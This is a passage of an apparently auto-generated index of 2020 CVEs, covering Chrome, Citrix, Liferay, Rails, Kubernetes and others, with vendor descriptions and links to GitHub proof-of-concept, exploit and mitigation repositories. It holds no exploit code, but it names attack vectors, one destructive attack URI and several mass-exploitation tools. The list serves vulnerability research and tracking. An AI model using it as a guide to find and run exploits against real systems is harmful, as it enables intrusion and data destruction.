- [SivaPriyaRanganatha/CVE-2020-6418](https://github.com/SivaPriyaRanganatha/CVE-2020-6418)
### CVE-2020-6468 (2020-05-21)
Type confusion in V8 in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
- [Goyotan/CVE-2020-6468-PoC](https://github.com/Goyotan/CVE-2020-6468-PoC)
- [kiks7/CVE-2020-6468-Chrome-Exploit](https://github.com/kiks7/CVE-2020-6468-Chrome-Exploit)
### CVE-2020-6514 (2020-07-22)
Inappropriate implementation in WebRTC in Google Chrome prior to 84.0.4147.89 allowed an attacker in a privileged network position to potentially exploit heap corruption via a crafted SCTP stream.
- [hasan-khalil/CVE-2020-6514](https://github.com/hasan-khalil/CVE-2020-6514)
### CVE-2020-6516 (2020-07-22)
Policy bypass in CORS in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to leak cross-origin data via a crafted HTML page.
- [CENSUS/whatsapp-mitd-mitm](https://github.com/CENSUS/whatsapp-mitd-mitm)
### CVE-2020-6519 (2020-07-22)
Policy bypass in CSP in Google Chrome prior to 84.0.4147.89 allowed a remote attacker to bypass content security policy via a crafted HTML page.
- [PerimeterX/CVE-2020-6519](https://github.com/PerimeterX/CVE-2020-6519)
### CVE-2020-6650 (2020-03-23)
UPS companion software v1.05 & Prior is affected by ‘Eval Injection’ vulnerability. The software does not neutralize or incorrectly neutralizes code syntax before using the input in a dynamic evaluation call e.g.”eval” in “Update Manager” class when software attempts to see if there are updates available. This results in arbitrary code execution on the machine where software is installed.
- [RavSS/Eaton-UPS-Companion-Exploit](https://github.com/RavSS/Eaton-UPS-Companion-Exploit)
### CVE-2020-6861 (2020-05-06)
A flawed protocol design in the Ledger Monero app before 1.5.1 for Ledger Nano and Ledger S devices allows a local attacker to extract the master spending key by sending crafted messages to this app selected on a PIN-entered Ledger connected to a host PC.
- [ph4r05/ledger-app-monero-1.42-vuln](https://github.com/ph4r05/ledger-app-monero-1.42-vuln)
### CVE-2020-6888
- [section-c/CVE-2020-6888](https://github.com/section-c/CVE-2020-6888)
### CVE-2020-7048 (2020-01-16)
The WordPress plugin, WP Database Reset through 3.1, contains a flaw that allowed any unauthenticated user to reset any table in the database to the initial WordPress set-up state (deleting all site content stored in that table), as demonstrated by a wp-admin/admin-post.php?db-reset-tables[]=comments URI.
- [ElmouradiAmine/CVE-2020-7048](https://github.com/ElmouradiAmine/CVE-2020-7048)
### CVE-2020-7115 (2020-06-03)
The ClearPass Policy Manager web interface is affected by a vulnerability that leads to authentication bypass. Upon successful bypass an attacker could then execute an exploit that would allow to remote command execution in the underlying operating system. Resolution: Fixed in 6.7.13-HF, 6.8.5-HF, 6.8.6, 6.9.1 and higher.
- [Retr02332/CVE-2020-7115](https://github.com/Retr02332/CVE-2020-7115)
### CVE-2020-7200 (2020-12-18)
A potential security vulnerability has been identified in HPE Systems Insight Manager (SIM) version 7.6. The vulnerability could be exploited to allow remote code execution.
- [alexfrancow/CVE-2020-7200](https://github.com/alexfrancow/CVE-2020-7200)
### CVE-2020-7246 (2020-01-21)
A remote code execution (RCE) vulnerability exists in qdPM 9.1 and earlier. An attacker can upload a malicious PHP code file via the profile photo functionality, by leveraging a path traversal vulnerability in the users['photop_preview'] delete photo feature, allowing bypass of .htaccess protection. NOTE: this issue exists because of an incomplete fix for CVE-2015-3884.
- [j0hn30n/CVE-2020-7246](https://github.com/j0hn30n/CVE-2020-7246)
- [arafatansari/SecAssignment](https://github.com/arafatansari/SecAssignment)
- [pswalia2u/CVE-2020-7246](https://github.com/pswalia2u/CVE-2020-7246)
### CVE-2020-7247 (2020-01-29)
smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.
- [FiroSolutions/cve-2020-7247-exploit](https://github.com/FiroSolutions/cve-2020-7247-exploit)
- [superzerosec/cve-2020-7247](https://github.com/superzerosec/cve-2020-7247)
- [r0lh/CVE-2020-7247](https://github.com/r0lh/CVE-2020-7247)
- [QTranspose/CVE-2020-7247-exploit](https://github.com/QTranspose/CVE-2020-7247-exploit)
- [bytescrappers/CVE-2020-7247](https://github.com/bytescrappers/CVE-2020-7247)
- [f4T1H21/CVE-2020-7247](https://github.com/f4T1H21/CVE-2020-7247)
- [SimonSchoeni/CVE-2020-7247-POC](https://github.com/SimonSchoeni/CVE-2020-7247-POC)
- [presentdaypresenttime/shai_hulud](https://github.com/presentdaypresenttime/shai_hulud)
### CVE-2020-7283 (2020-07-03)
Privilege Escalation vulnerability in McAfee Total Protection (MTP) before 16.0.R26 allows local users to create and edit files via symbolic link manipulation in a location they would otherwise not have access to. This is achieved through running a malicious script or program on the target machine.
- [RedyOpsResearchLabs/CVE-2020-7283-McAfee-Total-Protection-MTP-16.0.R26-EoP](https://github.com/RedyOpsResearchLabs/CVE-2020-7283-McAfee-Total-Protection-MTP-16.0.R26-EoP)
### CVE-2020-7352 (2020-08-06)
The GalaxyClientService component of GOG Galaxy runs with elevated SYSTEM privileges in a Windows environment. Due to the software shipping with embedded, static RSA private key, an attacker with this key material and local user permissions can effectively send any operating system command to the service for execution in this elevated context. The service listens for such commands on a locally-bound network port, localhost:9978. A Metasploit module has been published which exploits this vulnerability. This issue affects the 2.0.x branch of the software (2.0.12 and earlier) as well as the 1.2.x branch (1.2.64 and earlier). A fix was issued for the 2.0.x branch of the affected software.
- [szerszen199/PS-CVE-2020-7352](https://github.com/szerszen199/PS-CVE-2020-7352)
### CVE-2020-7378 (2020-11-24)
CRIXP OpenCRX version 4.30 and 5.0-20200717 and prior suffers from an unverified password change vulnerability. An attacker who is able to connect to the affected OpenCRX instance can change the password of any user, including admin-Standard, to any chosen value. This issue was resolved in version 5.0-20200904, released September 4, 2020.
- [ruthvikvegunta/openCRX-CVE-2020-7378](https://github.com/ruthvikvegunta/openCRX-CVE-2020-7378)
### CVE-2020-7384 (2020-10-29)
Rapid7's Metasploit msfvenom framework handles APK files in a way that allows for a malicious user to craft and publish a file that would execute arbitrary commands on a victim's machine.
- [nikhil1232/CVE-2020-7384](https://github.com/nikhil1232/CVE-2020-7384)
- [0xCarsonS/CVE-2020-7384](https://github.com/0xCarsonS/CVE-2020-7384)
### CVE-2020-7388 (2021-07-22)
Sage X3 Unauthenticated Remote Command Execution (RCE) as SYSTEM in AdxDSrv.exe component. By editing the client side authentication request, an attacker can bypass credential validation. While exploiting this does require knowledge of the installation path, that information can be learned by exploiting CVE-2020-7387. This issue was fixed in AdxAdmin 93.2.53, which ships with updates for on-premises versions of Sage X3 including Version 9 (components shipped with Syracuse 9.22.7.2 and later), Sage X3 HR & Payroll Version 9 (those components that ship with Syracuse 9.24.1.3), Version 11 (components shipped with Syracuse 11.25.2.6 and later), and Version 12 (components shipped with Syracuse 12.10.2.8 and later) of Sage X3. Other on-premises versions of Sage X3 are unsupported by the vendor.
- [ac3lives/sagex3-cve-2020-7388-poc](https://github.com/ac3lives/sagex3-cve-2020-7388-poc)
### CVE-2020-7461 (2021-03-26)
In FreeBSD 12.1-STABLE before r365010, 11.4-STABLE before r365011, 12.1-RELEASE before p9, 11.4-RELEASE before p3, and 11.3-RELEASE before p13, dhclient(8) fails to handle certain malformed input related to handling of DHCP option 119 resulting a heap overflow. The heap overflow could in principle be exploited to achieve remote code execution. The affected process runs with reduced privileges in a Capsicum sandbox, limiting the immediate impact of an exploit.
- [knqyf263/CVE-2020-7461](https://github.com/knqyf263/CVE-2020-7461)
- [0xkol/freebsd-dhclient-poc](https://github.com/0xkol/freebsd-dhclient-poc)
### CVE-2020-7471 (2020-02-03)
Django 1.11 before 1.11.28, 2.2 before 2.2.10, and 3.0 before 3.0.3 allows SQL Injection if untrusted data is used as a StringAgg delimiter (e.g., in Django applications that offer downloads of data as a series of rows with a user-specified column delimiter). By passing a suitably crafted delimiter to a contrib.postgres.aggregates.StringAgg instance, it was possible to break escaping and inject malicious SQL.
- [Saferman/CVE-2020-7471](https://github.com/Saferman/CVE-2020-7471)
- [secoba/DjVul_StringAgg](https://github.com/secoba/DjVul_StringAgg)
- [SNCKER/CVE-2020-7471](https://github.com/SNCKER/CVE-2020-7471)
- [Tempuss/CTF_CVE-2020-7471](https://github.com/Tempuss/CTF_CVE-2020-7471)
- [victomteng1997/cve-2020-7471-Time_Blind_SQLi-](https://github.com/victomteng1997/cve-2020-7471-Time_Blind_SQLi-)
- [huzaifakhan771/CVE-2020-7471-Django](https://github.com/huzaifakhan771/CVE-2020-7471-Django)
- [mrlihd/CVE-2020-7471](https://github.com/mrlihd/CVE-2020-7471)
### CVE-2020-7473 (2020-05-07)
In certain situations, all versions of Citrix ShareFile StorageZones (aka storage zones) Controller, including the most recent 5.10.x releases as of May 2020, allow unauthenticated attackers to access the documents and folders of ShareFile users. NOTE: unlike most CVEs, exploitability depends on the product version that was in use when a particular setup step was performed, NOT the product version that is in use during a current assessment of a CVE consumer's product inventory. Specifically, the vulnerability can be exploited if a storage zone was created by one of these product versions: 5.9.0, 5.8.0, 5.7.0, 5.6.0, 5.5.0, or earlier. This CVE differs from CVE-2020-8982 and CVE-2020-8983 but has essentially the same risk.
- [DimitriNL/CTX-CVE-2020-7473](https://github.com/DimitriNL/CTX-CVE-2020-7473)
### CVE-2020-7661 (2020-06-04)
all versions of url-regex are vulnerable to Regular Expression Denial of Service. An attacker providing a very long string in String.test can cause a Denial of Service.
- [spamscanner/url-regex-safe](https://github.com/spamscanner/url-regex-safe)
### CVE-2020-7693 (2020-07-09)
Incorrect handling of Upgrade header with the value websocket leads in crashing of containers hosting sockjs apps. This affects the package sockjs before 0.3.20.
- [andsnw/sockjs-dos-py](https://github.com/andsnw/sockjs-dos-py)
### CVE-2020-7699 (2020-07-30)
This affects the package express-fileupload before 1.1.8. If the parseNested option is enabled, sending a corrupt HTTP request can lead to denial of service or arbitrary code execution.
- [hemaoqi-Tom/CVE-2020-7699_reproduce](https://github.com/hemaoqi-Tom/CVE-2020-7699_reproduce)
### CVE-2020-7740 (2020-10-06)
This affects all versions of package node-pdf-generator. Due to lack of user input validation and sanitization done to the content given to node-pdf-generator, it is possible for an attacker to craft a url that will be passed to an external server allowing an SSRF attack.
- [CS4239-U6/node-pdf-generator-ssrf](https://github.com/CS4239-U6/node-pdf-generator-ssrf)
### CVE-2020-7799 (2020-01-28)
An issue was discovered in FusionAuth before 1.11.0. An authenticated user, allowed to edit e-mail templates (Home -> Settings -> Email Templates) or themes (Home -> Settings -> Themes), can execute commands on the underlying operating system by abusing freemarker.template.utility.Execute in the Apache FreeMarker engine that processes custom templates.
- [Pikaqi/cve-2020-7799](https://github.com/Pikaqi/cve-2020-7799)
- [ianxtianxt/CVE-2020-7799](https://github.com/ianxtianxt/CVE-2020-7799)
### CVE-2020-7897
- [mooneee/cve-2020-7897](https://github.com/mooneee/cve-2020-7897)
### CVE-2020-7931 (2020-01-23)
In JFrog Artifactory 5.x and 6.x, insecure FreeMarker template processing leads to remote code execution, e.g., by modifying a .ssh/authorized_keys file. Patches are available for various versions between 5.11.8 and 6.16.0. The issue exists because use of the DefaultObjectWrapper class makes certain Java functions accessible to a template.
- [gquere/CVE-2020-7931](https://github.com/gquere/CVE-2020-7931)
### CVE-2020-7934 (2020-01-28)
In LifeRay Portal CE 7.1.0 through 7.2.1 GA2, the First Name, Middle Name, and Last Name fields for user accounts in MyAccountPortlet are all vulnerable to a persistent XSS issue. Any user can modify these fields with a particular XSS payload, and it will be stored in the database. The payload will then be rendered when a user utilizes the search feature to search for other users (i.e., if a user with modified fields occurs in the search results). This issue was fixed in Liferay Portal CE version 7.3.0 GA1.
- [3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934](https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934)
- [Sergio235705/audit-xss-cve-2020-7934](https://github.com/Sergio235705/audit-xss-cve-2020-7934)
### CVE-2020-7961 (2020-03-20)
Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS).
- [mzer0one/CVE-2020-7961-POC](https://github.com/mzer0one/CVE-2020-7961-POC)
- [wcxxxxx/CVE-2020-7961](https://github.com/wcxxxxx/CVE-2020-7961)
- [thelostworldFree/CVE-2020-7961-payloads](https://github.com/thelostworldFree/CVE-2020-7961-payloads)
- [shacojx/LifeRCEJsonWSTool-POC-CVE-2020-7961-Gui](https://github.com/shacojx/LifeRCEJsonWSTool-POC-CVE-2020-7961-Gui)
- [shacojx/GLiferay-CVE-2020-7961-golang](https://github.com/shacojx/GLiferay-CVE-2020-7961-golang)
- [shacojx/POC-CVE-2020-7961-Token-iterate](https://github.com/shacojx/POC-CVE-2020-7961-Token-iterate)
- [ShutdownRepo/CVE-2020-7961](https://github.com/ShutdownRepo/CVE-2020-7961)
- [CrackerCat/CVE-2020-7961-Mass](https://github.com/CrackerCat/CVE-2020-7961-Mass)
- [pashayogi/CVE-2020-7961-Mass](https://github.com/pashayogi/CVE-2020-7961-Mass)
- [manrop2702/CVE-2020-7961](https://github.com/manrop2702/CVE-2020-7961)
- [NMinhTrung/LIFERAY-CVE-2020-7961](https://github.com/NMinhTrung/LIFERAY-CVE-2020-7961)
### CVE-2020-7980 (2020-01-25)
Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.
- [Xh4H/Satellian-CVE-2020-7980](https://github.com/Xh4H/Satellian-CVE-2020-7980)
### CVE-2020-8004 (2020-04-06)
STMicroelectronics STM32F1 devices have Incorrect Access Control.
- [wuxx/CVE-2020-8004](https://github.com/wuxx/CVE-2020-8004)
### CVE-2020-8012 (2020-02-18)
CA Unified Infrastructure Management (Nimsoft/UIM) 20.1, 20.3.x, and 9.20 and below contains a buffer overflow vulnerability in the robot (controller) component. A remote attacker can execute arbitrary code.
- [wetw0rk/Exploit-Development](https://github.com/wetw0rk/Exploit-Development)
### CVE-2020-8103 (2020-06-05)
A vulnerability in the improper handling of symbolic links in Bitdefender Antivirus Free can allow an unprivileged user to substitute a quarantined file, and restore it to a privileged location. This issue affects Bitdefender Antivirus Free versions prior to 1.0.17.178.
- [RedyOpsResearchLabs/-CVE-2020-8103-Bitdefender-Antivirus-Free-EoP](https://github.com/RedyOpsResearchLabs/-CVE-2020-8103-Bitdefender-Antivirus-Free-EoP)
### CVE-2020-8163 (2020-07-02)
The is a code injection vulnerability in versions of Rails prior to 5.0.1 that wouldallow an attacker who controlled the `locals` argument of a `render` call to perform a RCE.
- [lucasallan/CVE-2020-8163](https://github.com/lucasallan/CVE-2020-8163)
- [h4ms1k/CVE-2020-8163](https://github.com/h4ms1k/CVE-2020-8163)
- [RedPhantomRoot/CVE-2020-8163](https://github.com/RedPhantomRoot/CVE-2020-8163)
### CVE-2020-8165 (2020-06-19)
A deserialization of untrusted data vulnernerability exists in rails < 5.2.4.3, rails < 6.0.3.1 that can allow an attacker to unmarshal user-provided objects in MemCacheStore and RedisCacheStore potentially resulting in an RCE.
- [masahiro331/CVE-2020-8165](https://github.com/masahiro331/CVE-2020-8165)
- [umiterkol/CVE-2020-8165--Auto-Shell](https://github.com/umiterkol/CVE-2020-8165--Auto-Shell)
- [taipansec/CVE-2020-8165](https://github.com/taipansec/CVE-2020-8165)
- [hybryx/CVE-2020-8165](https://github.com/hybryx/CVE-2020-8165)
- [AssassinUKG/CVE-2020-8165](https://github.com/AssassinUKG/CVE-2020-8165)
- [progfay/CVE-2020-8165](https://github.com/progfay/CVE-2020-8165)
- [danielklim/cve-2020-8165-demo](https://github.com/danielklim/cve-2020-8165-demo)
### CVE-2020-8175 (2020-07-24)
Uncontrolled resource consumption in `jpeg-js` before 0.4.0 may allow attacker to launch denial of service attacks using specially a crafted JPEG image.
- [knokbak/get-pixels-updated](https://github.com/knokbak/get-pixels-updated)
- [knokbak/save-pixels-updated](https://github.com/knokbak/save-pixels-updated)
### CVE-2020-8193 (2020-07-10)
Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints.
- [jas502n/CVE-2020-8193](https://github.com/jas502n/CVE-2020-8193)
- [Airboi/Citrix-ADC-RCE-CVE-2020-8193](https://github.com/Airboi/Citrix-ADC-RCE-CVE-2020-8193)
- [Zeop-CyberSec/citrix_adc_netscaler_lfi](https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi)
- [PR3R00T/CVE-2020-8193-Citrix-Scanner](https://github.com/PR3R00T/CVE-2020-8193-Citrix-Scanner)
- [ctlyz123/CVE-2020-8193](https://github.com/ctlyz123/CVE-2020-8193)
### CVE-2020-8209 (2020-08-17)
Improper access control in Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6 and Citrix XenMobile Server before 10.9 RP5 and leads to the ability to read arbitrary files.
- [B1anda0/CVE-2020-8209](https://github.com/B1anda0/CVE-2020-8209)
### CVE-2020-8218 (2020-07-30)
A code injection vulnerability exists in Pulse Connect Secure <9.1R8 that allows an attacker to crafted a URI to perform an arbitrary code execution via the admin web interface.
- [withdk/pulse-gosecure-rce-poc](https://github.com/withdk/pulse-gosecure-rce-poc)
### CVE-2020-8241 (2020-10-28)
A vulnerability in the Pulse Secure Desktop Client < 9.1R9 could allow the attacker to perform a MITM Attack if end users are convinced to connect to a malicious server.
- [withdk/pulse-secure-vpn-mitm-research](https://github.com/withdk/pulse-secure-vpn-mitm-research)
### CVE-2020-8248 (2020-10-28)
A vulnerability in the Pulse Secure Desktop Client (Linux) < 9.1R9 could allow local attackers to escalate privilege.
- [mbadanoiu/CVE-2020-8248](https://github.com/mbadanoiu/CVE-2020-8248)
### CVE-2020-8249 (2020-10-28)
A vulnerability in the Pulse Secure Desktop Client (Linux) < 9.1R9 could allow local attackers to perform buffer overflow.
- [mbadanoiu/CVE-2020-8249](https://github.com/mbadanoiu/CVE-2020-8249)
### CVE-2020-8250 (2020-10-28)
A vulnerability in the Pulse Secure Desktop Client (Linux) < 9.1R9 could allow local attackers to escalate privilege.
- [mbadanoiu/CVE-2020-8250](https://github.com/mbadanoiu/CVE-2020-8250)
### CVE-2020-8254 (2020-10-28)
A vulnerability in the Pulse Secure Desktop Client < 9.1R9 has Remote Code Execution (RCE) if users can be convinced to connect to a malicious server. This vulnerability only affects Windows PDC.To improve the security of connections between Pulse clients and Pulse Connect Secure, see below recommendation(s):Disable Dynamic certificate trust for PDC.
- [mbadanoiu/CVE-2020-8254](https://github.com/mbadanoiu/CVE-2020-8254)
### CVE-2020-8277 (2020-11-19)
A Node.js application that allows an attacker to trigger a DNS request for a host of their choice could trigger a Denial of Service in versions < 15.2.1, < 14.15.1, and < 12.19.1 by getting the application to resolve a DNS record with a larger number of responses. This is fixed in 15.2.1, 14.15.1, and 12.19.1.
- [masahiro331/CVE-2020-8277](https://github.com/masahiro331/CVE-2020-8277)
- [AndrewIjano/CVE-2020-8277](https://github.com/AndrewIjano/CVE-2020-8277)
### CVE-2020-8287 (2021-01-06)
Node.js versions before 10.23.1, 12.20.1, 14.15.4, 15.5.1 allow two copies of a header field in an HTTP request (for example, two Transfer-Encoding header fields). In this case, Node.js identifies the first header field and ignores the second. This can lead to HTTP Request Smuggling.
- [progfay/nodejs-http-transfer-encoding-smuggling-poc](https://github.com/progfay/nodejs-http-transfer-encoding-smuggling-poc)
### CVE-2020-8289 (2020-12-27)
Backblaze for Windows before 7.0.1.433 and Backblaze for macOS before 7.0.1.434 suffer from improper certificate validation in `bztransmit` helper due to hardcoded whitelist of strings in URLs where validation is disabled leading to possible remote code execution via client update functionality.
- [geffner/CVE-2020-8289](https://github.com/geffner/CVE-2020-8289)
### CVE-2020-8290 (2020-12-27)
Backblaze for Windows and Backblaze for macOS before 7.0.0.439 suffer from improper privilege management in `bztransmit` helper due to lack of permission handling and validation before creation of client update directories allowing for local escalation of privilege via rogue client update binary.
- [geffner/CVE-2020-8290](https://github.com/geffner/CVE-2020-8290)
### CVE-2020-8300 (2021-06-16)
Citrix ADC and Citrix/NetScaler Gateway before 13.0-82.41, 12.1-62.23, 11.1-65.20 and Citrix ADC 12.1-FIPS before 12.1-55.238 suffer from improper access control allowing SAML authentication hijack through a phishing attack to steal a valid user session. Note that Citrix ADC or Citrix Gateway must be configured as a SAML SP or a SAML IdP for this to be possible.
- [stuartcarroll/CitrixADC-CVE-2020-8300](https://github.com/stuartcarroll/CitrixADC-CVE-2020-8300)
### CVE-2020-8417 (2020-01-28)
The Code Snippets plugin before 2.14.0 for WordPress allows CSRF because of the lack of a Referer check on the import menu.
- [vulncrate/wp-codesnippets-cve-2020-8417](https://github.com/vulncrate/wp-codesnippets-cve-2020-8417)
- [waleweewe12/CVE-2020-8417](https://github.com/waleweewe12/CVE-2020-8417)
- [Rapidsafeguard/codesnippets_CVE-2020-8417](https://github.com/Rapidsafeguard/codesnippets_CVE-2020-8417)
- [Vulnmachines/WordPress_CVE-2020-8417](https://github.com/Vulnmachines/WordPress_CVE-2020-8417)
### CVE-2020-8423 (2020-04-02)
A buffer overflow in the httpd daemon on TP-Link TL-WR841N V10 (firmware version 3.16.9) devices allows an authenticated remote attacker to execute arbitrary code via a GET request to the page for the configuration of the Wi-Fi network.
- [lnversed/CVE-2020-8423](https://github.com/lnversed/CVE-2020-8423)
### CVE-2020-8437 (2020-03-02)
The bencoding parser in BitTorrent uTorrent through 3.5.5 (build 45505) misparses nested bencoded dictionaries, which allows a remote attacker to cause a denial of service.
- [mavlevin/uTorrent-CVE-2020-8437](https://github.com/mavlevin/uTorrent-CVE-2020-8437)
### CVE-2020-8515 (2020-02-01)
DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1.
- [imjdl/CVE-2020-8515-PoC](https://github.com/imjdl/CVE-2020-8515-PoC)
- [truerandom/nmap_draytek_rce](https://github.com/truerandom/nmap_draytek_rce)
- [darrenmartyn/CVE-2020-8515](https://github.com/darrenmartyn/CVE-2020-8515)
### CVE-2020-8554 (2021-01-21)
Kubernetes API server in all versions allow an attacker who is able to create a ClusterIP service and set the spec.externalIPs field, to intercept traffic to that IP address. Additionally, an attacker who is able to patch the status (which is considered a privileged operation and should not typically be granted to users) of a LoadBalancer service can set the status.loadBalancer.ingress.ip to similar effect.
- [rancher/externalip-webhook](https://github.com/rancher/externalip-webhook)
- [jrmurray000/CVE-2020-8554](https://github.com/jrmurray000/CVE-2020-8554)
- [twistlock/k8s-cve-2020-8554-mitigations](https://github.com/twistlock/k8s-cve-2020-8554-mitigations)
- [Dviejopomata/CVE-2020-8554](https://github.com/Dviejopomata/CVE-2020-8554)
- [alebedev87/gatekeeper-cve-2020-8554](https://github.com/alebedev87/gatekeeper-cve-2020-8554)
### CVE-2020-8558 (2020-07-27)
The Kubelet and kube-proxy components in versions 1.1.0-1.16.10, 1.17.0-1.17.6, and 1.18.0-1.18.3 were found to contain a security issue which allows adjacent hosts to reach TCP and UDP services bound to 127.0.0.1 running on the node or in the node's network namespace. Such a service is generally thought to be reachable only by other processes on the same host, but due to this defeect, could be reachable by other hosts on the same LAN as the node, or by containers running on the same node as the service.
- [tabbysable/POC-2020-8558](https://github.com/tabbysable/POC-2020-8558)
- [rhysemmas/martian-packets](https://github.com/rhysemmas/martian-packets)
### CVE-2020-8559 (2020-07-22)
The Kubernetes kube-apiserver in versions v1.6-v1.15, and versions prior to v1.16.13, v1.17.9 and v1.18.6 are vulnerable to an unvalidated redirect on proxied upgrade requests that could allow an attacker to escalate privileges from a node compromise to a full cluster compromise.
- [tabbysable/POC-2020-8559](https://github.com/tabbysable/POC-2020-8559)
- [tdwyer/CVE-2020-8559](https://github.com/tdwyer/CVE-2020-8559)
### CVE-2020-8597 (2020-02-03)
eap.c in pppd in ppp 2.4.2 through 2.4.8 has an rhostname buffer overflow in the eap_request and eap_response functions.
- [dointisme/CVE-2020-8597](https://github.com/dointisme/CVE-2020-8597)
- [WinMin/CVE-2020-8597](https://github.com/WinMin/CVE-2020-8597)
- [Dilan-Diaz/Point-to-Point-Protocol-Daemon-RCE-Vulnerability-CVE-2020-8597-](https://github.com/Dilan-Diaz/Point-to-Point-Protocol-Daemon-RCE-Vulnerability-CVE-2020-8597-)
- [lakwsh/CVE-2020-8597](https://github.com/lakwsh/CVE-2020-8597)
### CVE-2020-8617 (2020-05-19)
Using a specially-crafted message, an attacker may potentially cause a BIND server to reach an inconsistent state if the attacker knows (or successfully guesses) the name of a TSIG key used by the server. Since BIND, by default, configures a local session key even on servers whose configuration does not otherwise make use of it, almost all current BIND servers are vulnerable. In releases of BIND dating from March 2018 and after, an assertion check in tsig.c detects this inconsistent state and deliberately exits. Prior to the introduction of the check the server would continue operating in an inconsistent state, with potentially harmful results.
- [knqyf263/CVE-2020-8617](https://github.com/knqyf263/CVE-2020-8617)
- [gothburz/cve-2020-8617](https://github.com/gothburz/cve-2020-8617)
### CVE-2020-8635 (2020-03-06)
Wing FTP Server v6.2.3 for Linux, macOS, and Solaris sets insecure permissions on installation directories and configuration files. This allows local users to arbitrarily create FTP users with full privileges, and escalate privileges within the operating system by modifying system files.
- [Al1ex/CVE-2020-8635](https://github.com/Al1ex/CVE-2020-8635)
### CVE-2020-8637 (2020-04-03)
A SQL injection vulnerability in TestLink 1.9.20 allows attackers to execute arbitrary SQL commands in dragdroptreenodes.php via the node_id parameter.
- [DXY0411/CVE-2020-8637](https://github.com/DXY0411/CVE-2020-8637)
### CVE-2020-8644 (2020-02-05)
PlaySMS before 1.4.3 does not sanitize inputs from a malicious string.
- [H3rm1tR3b0rn/CVE-2020-8644-PlaySMS-1.4](https://github.com/H3rm1tR3b0rn/CVE-2020-8644-PlaySMS-1.4)
### CVE-2020-8809 (2020-02-25)
Gurux GXDLMS Director prior to 8.5.1905.1301 downloads updates to add-ins and OBIS code over an unencrypted HTTP connection. A man-in-the-middle attacker can prompt the user to download updates by modifying the contents of gurux.fi/obis/files.xml and gurux.fi/updates/updates.xml. Then, the attacker can modify the contents of downloaded files. In the case of add-ins (if the user is using those), this will lead to code execution. In case of OBIS codes (which the user is always using as they are needed to communicate with the energy meters), this can lead to code execution when combined with CVE-2020-8810.
- [seqred-s-a/gxdlmsdirector-cve](https://github.com/seqred-s-a/gxdlmsdirector-cve)
### CVE-2020-8813 (2020-02-22)
graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.
- [mhaskar/CVE-2020-8813](https://github.com/mhaskar/CVE-2020-8813)
- [0xm4ud/Cacti-CVE-2020-8813](https://github.com/0xm4ud/Cacti-CVE-2020-8813)
- [hexcowboy/CVE-2020-8813](https://github.com/hexcowboy/CVE-2020-8813)
- [p0dalirius/CVE-2020-8813-Cacti-RCE-in-graph_realtime](https://github.com/p0dalirius/CVE-2020-8813-Cacti-RCE-in-graph_realtime)
### CVE-2020-8816 (2020-05-29)
Pi-hole Web v4.3.2 (aka AdminLTE) allows Remote Code Execution by privileged dashboard users via a crafted DHCP static lease.
- [AndreyRainchik/CVE-2020-8816](https://github.com/AndreyRainchik/CVE-2020-8816)
- [martinsohn/CVE-2020-8816](https://github.com/martinsohn/CVE-2020-8816)
- [cybervaca/CVE-2020-8816](https://github.com/cybervaca/CVE-2020-8816)
- [team0se7en/CVE-2020-8816](https://github.com/team0se7en/CVE-2020-8816)
### CVE-2020-8825 (2020-02-10)
index.php?p=/dashboard/settings/branding in Vanilla 2.6.3 allows stored XSS.
- [hacky1997/CVE-2020-8825](https://github.com/hacky1997/CVE-2020-8825)
### CVE-2020-8835 (2020-04-02)
In the Linux kernel 5.5.0 and newer, the bpf verifier (kernel/bpf/verifier.c) did not properly restrict the register bounds for 32-bit operations, leading to out-of-bounds reads and writes in kernel memory. The vulnerability also affects the Linux 5.4 stable series, starting with v5.4.7, as the introducing commit was backported to that branch. This vulnerability was fixed in 5.6.1, 5.5.14, and 5.4.29. (issue is aka ZDI-CAN-10780)
- [Prabhashaka/Exploitation-CVE-2020-8835](https://github.com/Prabhashaka/Exploitation-CVE-2020-8835)
- [snappyJack/Rick_write_exp_CVE-2020-8835](https://github.com/snappyJack/Rick_write_exp_CVE-2020-8835)
- [zilong3033/CVE-2020-8835](https://github.com/zilong3033/CVE-2020-8835)
- [SplendidSky/CVE-2020-8835](https://github.com/SplendidSky/CVE-2020-8835)
- [digamma-ai/CVE-2020-8835-verification](https://github.com/digamma-ai/CVE-2020-8835-verification)
### CVE-2020-8840 (2020-02-10)
FasterXML jackson-databind 2.0.0 through 2.9.10.2 lacks certain xbean-reflect/JNDI blocking, as demonstrated by org.apache.xbean.propertyeditor.JndiConverter.
- [jas502n/jackson-CVE-2020-8840](https://github.com/jas502n/jackson-CVE-2020-8840)
- [Wfzsec/FastJson1.2.62-RCE](https://github.com/Wfzsec/FastJson1.2.62-RCE)
- [fairyming/CVE-2020-8840](https://github.com/fairyming/CVE-2020-8840)
- [Blyth0He/CVE-2020-8840](https://github.com/Blyth0He/CVE-2020-8840)
- [Veraxy00/CVE-2020-8840](https://github.com/Veraxy00/CVE-2020-8840)
